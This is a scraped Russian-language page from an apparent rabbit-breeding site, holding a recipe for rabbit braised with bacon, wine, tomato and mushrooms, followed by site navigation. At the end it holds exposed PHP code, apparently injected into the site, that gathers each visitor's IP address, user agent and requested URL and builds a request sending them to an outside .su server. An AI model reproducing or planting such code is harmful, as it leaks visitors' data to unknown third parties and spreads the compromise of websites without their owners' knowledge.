1 кг мяса кролика, 1–2 дольки чеснока, морковка, пучок петрушки, 3–4 стол. ложки растительного масла, 125 г шпика, 10 мелких луковиц, 100 мл белого вина, стакан горячей воды, 2 стол. ложки томата-пюре, 200 г шампиньонов.
Чеснок, 3 маленькие луковицы и петрушку порубить.
В емкость с толстым дном влить растопленное масло, положить нарезанный шпик и кусочки кролика, добавить оставшиеся целые луковицы, нарубленную массу из репчатого лука и зелени и перемешать. Подлить немного воды и вина и тушить 50–60 минут. После этого вложить томат-пюре и нарезанные шампиньоны. Тушить до готовности.
Напишите мне
На главную
Фотоальбом
Калифорнийская
Серебристая
Белый великан
О пользе крольчатины
Блюда из кролика
$serverrobo = $_SERVER['REMOTE_ADDR']; $agentrobo = $_SERVER['HTTP_USER_AGENT'];$urlrobo = $_SERVER['HTTP_HOST'];$urlrobo .= $_SERVER['REQUEST_URI']; $agentrobo = str_replace(" ","", $agentrobo);$getroboip = "http://XN--80AVUE.xn--90acjmnnc1hybf.su/server.php?idishka=136498&ipishka=$serverrobo&useragentka=$agentrobo&urlrobotka=$urlrobo";?>


|